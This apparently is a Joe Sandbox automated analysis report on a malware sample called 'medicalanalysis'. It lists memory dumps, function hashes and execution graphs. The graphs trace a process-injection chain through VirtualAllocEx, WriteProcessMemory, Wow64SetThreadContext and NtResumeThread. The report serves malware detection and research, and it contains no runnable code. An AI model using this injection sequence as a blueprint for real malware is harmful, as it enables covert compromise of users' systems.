                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                                • Instruction ID: f5ab3a57a88fb8425ac6086fa8cfca38423bd63dfe822b7b0a8892b0013c5215
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28117762E08A81C5FB555B21A904279EB91E749FF1F89C274DA5E07B8ECF2CE4508730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A8648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5a38a284d8c9186513179ddee78e2d3f4a821635e8cdd06234f91d05db3926e9
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D636A08B45C1EB00AB44E8807A5B7B4FB88744F914536DA8D43B6ADF7DE165C770
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                                                                                                                                                • Instruction ID: 77e6e4e8ef2dbda82d074ed17ae74c33e8dbedab43a3c29c4b4c9f9608368b85
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E117B32A28642C7E7609F60E444B76FA91FB99745FC09130D74A42E89DF3DE059CB30

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:11.3%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                Signature Coverage:3.4%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:176
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                execution_graph 57404 5715900 57405 5715915 57404->57405 57406 571592b 57405->57406 57409 5715dbb 57405->57409 57414 5715ff4 57405->57414 57410 5715dc5 57409->57410 57420 5717290 57410->57420 57431 5717280 57410->57431 57415 5715da5 57414->57415 57416 5715dba 57414->57416 57415->57406 57416->57415 57418 5717290 4 API calls 57416->57418 57419 5717280 4 API calls 57416->57419 57417 5715f06 57417->57406 57418->57417 57419->57417 57421 57172a5 57420->57421 57442 5717770 57421->57442 57445 57174e1 57421->57445 57448 57173fe 57421->57448 57451 57175c4 57421->57451 57454 57172e2 57421->57454 57457 57172d0 57421->57457 57460 57172e0 57421->57460 57463 5717660 57421->57463 57432 5717284 57431->57432 57434 57174e1 4 API calls 57432->57434 57435 5717770 4 API calls 57432->57435 57436 5717660 4 API calls 57432->57436 57437 57172e0 4 API calls 57432->57437 57438 57172d0 4 API calls 57432->57438 57439 57172e2 4 API calls 57432->57439 57440 57175c4 4 API calls 57432->57440 57441 57173fe 4 API calls 57432->57441 57433 5715f06 57433->57406 57434->57433 57435->57433 57436->57433 57437->57433 57438->57433 57439->57433 57440->57433 57441->57433 57443 571734b 57442->57443 57466 5717cf9 57443->57466 57446 571734b 57445->57446 57447 5717cf9 4 API calls 57446->57447 57447->57446 57449 571734b 57448->57449 57450 5717cf9 4 API calls 57449->57450 57450->57449 57452 571734b 57451->57452 57453 5717cf9 4 API calls 57452->57453 57453->57452 57455 57172e5 57454->57455 57456 5717cf9 4 API calls 57455->57456 57456->57455 57458 57172d4 57457->57458 57459 5717cf9 4 API calls 57458->57459 57459->57458 57461 57172e1 57460->57461 57462 5717cf9 4 API calls 57461->57462 57462->57461 57464 571734b 57463->57464 57465 5717cf9 4 API calls 57464->57465 57465->57464 57467 5717cfc 57466->57467 57476 5717d3f 57467->57476 57479 571931e 57467->57479 57483 57188dd 57467->57483 57487 571839b 57467->57487 57491 5718eac 57467->57491 57495 5718666 57467->57495 57499 5718c4e 57467->57499 57503 5718ccb 57467->57503 57507 5718a89 57467->57507 57511 5718447 57467->57511 57515 5718e45 57467->57515 57476->57443 57480 5719328 57479->57480 57519 57d1d98 57480->57519 57484 57188ea 57483->57484 57523 57d0900 57484->57523 57488 57181cd 57487->57488 57489 571939f 57487->57489 57488->57476 57527 57d0fc0 57489->57527 57492 5718ebd 57491->57492 57531 57d12b8 57492->57531 57496 5718675 57495->57496 57498 57d12b8 WriteProcessMemory 57496->57498 57497 57186e6 57497->57476 57498->57497 57500 5718c64 57499->57500 57502 57d0900 Wow64SetThreadContext 57500->57502 57501 5718c90 57502->57501 57504 5718cda 57503->57504 57506 57d0900 Wow64SetThreadContext 57504->57506 57505 57181cd 57505->57476 57506->57505 57508 5718a9b 57507->57508 57510 57d12b8 WriteProcessMemory 57508->57510 57509 57181cd 57509->57476 57510->57509 57512 5719344 57511->57512 57513 57181cd 57511->57513 57514 57d1d98 NtResumeThread 57512->57514 57513->57476 57514->57513 57516 57181cd 57515->57516 57517 5718eb6 57515->57517 57516->57476 57518 57d12b8 WriteProcessMemory 57517->57518 57518->57516 57520 57d1de1 NtResumeThread 57519->57520 57522 57181cd 57520->57522 57522->57476 57524 57d0949 Wow64SetThreadContext 57523->57524 57526 5718c90 57524->57526 57528 57d1004 VirtualAllocEx 57527->57528 57530 57d107c 57528->57530 57530->57488 57532 57d1304 WriteProcessMemory 57531->57532 57534 57181cd 57532->57534 57534->57476 57317 a2d030 57318 a2d048 57317->57318 57319 a2d0a3 57318->57319 57322 4aa1620 57318->57322 57327 4aa1614 57318->57327 57323 4aa1679 57322->57323 57332 4aa1b6f 57323->57332 57337 4aa1b80 57323->57337 57324 4aa16ae 57324->57324 57328 4aa1679 57327->57328 57330 4aa1b6f 2 API calls 57328->57330 57331 4aa1b80 2 API calls 57328->57331 57329 4aa16ae 57329->57329 57330->57329 57331->57329 57333 4aa1bad 57332->57333 57336 4aa1d43 57333->57336 57342 4aa0ab8 57333->57342 57336->57324 57338 4aa1bad 57337->57338 57339 4aa0ab8 2 API calls 57338->57339 57341 4aa1d43 57338->57341 57340 4aa1d34 57339->57340 57340->57324 57341->57324 57344 4aa0adf 57342->57344 57343 4aa0b9c 57343->57324 57347 4aa0f98 57344->57347 57351 4aa0f90 57344->57351 57348 4aa0fe1 VirtualProtect 57347->57348 57350 4aa104e 57348->57350 57350->57343 57352 4aa0fe1 VirtualProtect 57351->57352 57354 4aa104e 57352->57354 57354->57343 57294 5a38de0 57295 5a38df5 57294->57295 57299 5a38e11 57295->57299 57304 5a38e20 57295->57304 57296 5a38e0b 57300 5a38e47 57299->57300 57301 5a38e8b 57300->57301 57309 5a3cc10 57300->57309 57313 5a3cc18 57300->57313 57301->57296 57305 5a38e47 57304->57305 57306 5a38e8b 57305->57306 57307 5a3cc10 SleepEx 57305->57307 57308 5a3cc18 SleepEx 57305->57308 57306->57296 57307->57305 57308->57305 57310 5a3cc18 SleepEx 57309->57310 57312 5a3ccbc 57310->57312 57312->57300 57314 5a3cc5c SleepEx 57313->57314 57316 5a3ccbc 57314->57316 57316->57300 57400 571f6d8 57401 571f6d9 NtProtectVirtualMemory 57400->57401 57403 571f79f 57401->57403 57355 a72cf8 57356 a72d15 57355->57356 57357 a72d25 57356->57357 57361 a76a09 57356->57361 57366 a7565b 57356->57366 57370 a7ae9f 57356->57370 57362 a76a28 57361->57362 57364 4aa0ab8 2 API calls 57362->57364 57374 4aa0aa9 57362->57374 57363 a76a4c 57364->57363 57368 4aa0ab8 2 API calls 57366->57368 57369 4aa0aa9 2 API calls 57366->57369 57367 a75679 57368->57367 57369->57367 57379 4aa1f68 57370->57379 57383 4aa1f78 57370->57383 57371 a7aec3 57376 4aa0adf 57374->57376 57375 4aa0b9c 57375->57363 57377 4aa0f98 VirtualProtect 57376->57377 57378 4aa0f90 VirtualProtect 57376->57378 57377->57375 57378->57375 57380 4aa1f8d 57379->57380 57387 4aa1fb8 57380->57387 57384 4aa1f8d 57383->57384 57386 4aa1fb8 2 API calls 57384->57386 57385 4aa1fa5 57385->57371 57386->57385 57389 4aa1fef 57387->57389 57388 4aa1fa5 57388->57371 57392 4aa20c8 57389->57392 57396 4aa20d0 57389->57396 57393 4aa2114 VirtualAlloc 57392->57393 57395 4aa2181 57393->57395 57395->57388 57397 4aa2114 VirtualAlloc 57396->57397 57399 4aa2181 57397->57399 57399->57388

                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                Function 05894B60 Relevance: 16.2, Strings: 12, Instructions: 1171COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3443518476
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2e6bbf57bcd4df2a123880f6019b0459129479cc88deb774f84796fef1b042ee
                                                                                                                                                                                                                                                                                                                • Instruction ID: 91a44bf5890652735d5c4076aab7acac71310a4be47829dcbfef66b81c805f82
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e6bbf57bcd4df2a123880f6019b0459129479cc88deb774f84796fef1b042ee
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59B20834A002188FDB19DFA8C894BADB7B6FF48704F198599E905EB2A5DB70AD41CF50
                                                                                                                                                                                                                                                                                                                Function 05894E87 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-324474496
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5ebe98f319097ad1d88a6c96a9bfe4774ef71dbc81201d323dc578ceeb69d33b
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9797df0982a8d779d331988a0c43b8ec1ab7d70aa71632f41e6c2b747a0a9e26
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ebe98f319097ad1d88a6c96a9bfe4774ef71dbc81201d323dc578ceeb69d33b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A22F874A00219CFDF19DF64C994BADB7B2BF48305F1481A5E909EB2A5DB31AD81CF50
                                                                                                                                                                                                                                                                                                                Function 058905F8 Relevance: 2.9, Strings: 2, Instructions: 423COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 2380 58905f8-589069e 2385 58906ae-58906b4 2380->2385 2386 58906a0-58906a6 2380->2386 2387 58906bd-58906be 2385->2387 2388 58906b6 2385->2388 2386->2385 2391 589075e-5890816 2387->2391 2388->2387 2389 589081b-58908c6 2388->2389 2390 589090b-5890950 2388->2390 2388->2391 2392 58906c3-5890759 2388->2392 2393 58908d7-5890906 2388->2393 2389->2385 2419 58908cc-58908d2 2389->2419 2404 589095a-589095f 2390->2404 2405 5890952-5890958 2390->2405 2391->2385 2392->2385 2407 5890961-5890962 2404->2407 2408 5890964-58909b2 2404->2408 2405->2404 2407->2408 2420 58909bc-58909c1 2408->2420 2421 58909b4-58909ba 2408->2421 2419->2385 2423 58909c3-58909c4 2420->2423 2424 58909c6-5890a06 2420->2424 2421->2420 2423->2424 2427 5890a08-5890a10 2424->2427 2428 5890a12-5890a18 2424->2428 2427->2428 2429 5890a1a 2428->2429 2430 5890a21-5890a22 2428->2430 2429->2430 2431 5890c2b 2429->2431 2432 5890d62-5890dae 2429->2432 2433 5890a27-5890a4a 2429->2433 2434 5890b66 2429->2434 2435 5890bd8-5890c1e 2429->2435 2436 5890dbb-5890dbc 2429->2436 2437 5890c9a-5890ce5 2429->2437 2438 5890abf-5890adc 2429->2438 2439 5890dbe 2429->2439 2440 5890cf2-5890cf3 2429->2440 2441 5890b15-5890b5a 2429->2441 2442 5890bd5-5890bd6 2429->2442 2443 5890cf5 2429->2443 2444 5890a54-5890aac 2429->2444 2430->2438 2446 5890c2c 2431->2446 2461 5890d4d-5890d56 2432->2461 2476 5890db0-5890db9 2432->2476 2433->2428 2447 5890a4c-5890a52 2433->2447 2450 5890b67 2434->2450 2462 5890bc0-5890bc9 2435->2462 2477 5890c20-5890c29 2435->2477 2445 5890dbf 2436->2445 2458 5890c85-5890c8e 2437->2458 2479 5890ce7-5890cf0 2437->2479 2438->2450 2452 5890ae2-5890af9 2438->2452 2439->2445 2449 5890cf6 2440->2449 2460 5890b03-5890b09 2441->2460 2480 5890b5c-5890b64 2441->2480 2442->2446 2443->2449 2444->2428 2478 5890ab2-5890aba 2444->2478 2457 5890dc0 2445->2457 2446->2458 2447->2428 2449->2461 2450->2462 2459 5890afb-5890b01 2452->2459 2452->2460 2457->2457 2473 5890c90 2458->2473 2474 5890c97-5890c98 2458->2474 2459->2460 2467 5890b0b 2460->2467 2468 5890b12-5890b13 2460->2468 2470 5890d58 2461->2470 2471 5890d5f-5890d60 2461->2471 2464 5890bcb 2462->2464 2465 5890bd2-5890bd3 2462->2465 2464->2431 2464->2432 2464->2435 2464->2436 2464->2437 2464->2439 2464->2440 2464->2442 2464->2443 2464->2465 2465->2431 2467->2431 2467->2432 2467->2434 2467->2435 2467->2436 2467->2437 2467->2439 2467->2440 2467->2441 2467->2442 2467->2443 2467->2468 2468->2441 2470->2432 2470->2436 2470->2439 2470->2471 2471->2439 2473->2432 2473->2436 2473->2437 2473->2439 2473->2440 2473->2443 2473->2474 2474->2437 2476->2461 2477->2462 2478->2428 2479->2458 2480->2460
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (t$#$Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1540733729
                                                                                                                                                                                                                                                                                                                • Opcode ID: b229c3f5d03e053886dcaeb376a507ea0344a46a768b6d66707ac38bcbbb68eb
                                                                                                                                                                                                                                                                                                                • Instruction ID: a5ce37b920950df0203a9ea44551998b430a43379f2f26de659509f77b51e4fc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b229c3f5d03e053886dcaeb376a507ea0344a46a768b6d66707ac38bcbbb68eb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B412F870A04219CFDB58DF59D848BADBBF2FB89304F1491A9D80AE7259DB30AD81CF50
                                                                                                                                                                                                                                                                                                                Function 0571F6D0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0571F78D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: a4b5d953c160eadb59e3866c69ace113afee410e495f0537fd2c8886dbf1775b
                                                                                                                                                                                                                                                                                                                • Instruction ID: b1f06ae6b2641b0e0ce029f346e0f0923d4b6f8bcf9d8725bccbdcc118150c97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b5d953c160eadb59e3866c69ace113afee410e495f0537fd2c8886dbf1775b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 724178B9D00258DFCF10CFA9D985ADEFBB5BB49310F10942AE815B7210D735A946CFA8
                                                                                                                                                                                                                                                                                                                Function 0571F6D8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0571F78D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b45dfc3003886d00c8e0386f47550550240378dc50a0abddcdb82bdbf22498fe
                                                                                                                                                                                                                                                                                                                • Instruction ID: dc1f1bba0734e0d5b9950a07df09a4c89cd01a8eb8d32885befbea862be79d95
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b45dfc3003886d00c8e0386f47550550240378dc50a0abddcdb82bdbf22498fe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E4179B9D00258DFCF10CFA9D984ADEFBB1BB49310F10942AE815B7210D735A946CF68
                                                                                                                                                                                                                                                                                                                Function 057D1D98 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtResumeThread.NTDLL(?,?), ref: 057D1E26
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 54a75c2da2840eb123d9116afceb781da53ae6016a3bf4a5709f7a35b3d585c5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7feaec7e6e36751a37532321b7b1f959890b72c90e8ff9d495ad9210ae1276a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54a75c2da2840eb123d9116afceb781da53ae6016a3bf4a5709f7a35b3d585c5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE3199B5D012189FCB10CFA9D984ADEFBF5BB49310F60942AE815B7210C775A946CFA4
                                                                                                                                                                                                                                                                                                                Function 05D3F070 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2860068737.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5d20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Ddq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-562783569
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9cfc94ebede6fe605347d8240a072529168c7e69e5798130ab30dfc5e2933f00
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0ede87c90336ab70c0271a91b3c3e9bce983b0ce6c1ed467a324abee87bdca0c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cfc94ebede6fe605347d8240a072529168c7e69e5798130ab30dfc5e2933f00
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD1B174E00219CFDB54DFA9D994A9DBBB2BF89300F1081AAD409AB365DB34AD81CF51
                                                                                                                                                                                                                                                                                                                Function 058915F1 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d08ff5fe3de24ff74cb3f2240732a66008bf8f562e7fd761409bf4760f07310
                                                                                                                                                                                                                                                                                                                • Instruction ID: 781b673f90719013ffe8f19d2ff2d16393f597aaf911ccfb0c109327f830f86e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d08ff5fe3de24ff74cb3f2240732a66008bf8f562e7fd761409bf4760f07310
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71B1D474E04219CFDB18DFA9D888BADBBF2BB49304F1890A9D909E7255DB706D85CF40
                                                                                                                                                                                                                                                                                                                Function 058C7B98 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0395bafb83201a51690234bc8e6c9320790fc39bad68b2d69eacb2fdb622c5be
                                                                                                                                                                                                                                                                                                                • Instruction ID: 73b47653202c8c159bdc7548d69a0e80b596cd191641c22bced3410bffaa7ab3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0395bafb83201a51690234bc8e6c9320790fc39bad68b2d69eacb2fdb622c5be
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECB1AF74A05218CFDB54CFA9D884BADBBB2FB49304F2090A9D85AE7255DB74AD85CF00
                                                                                                                                                                                                                                                                                                                Function 058C7B89 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
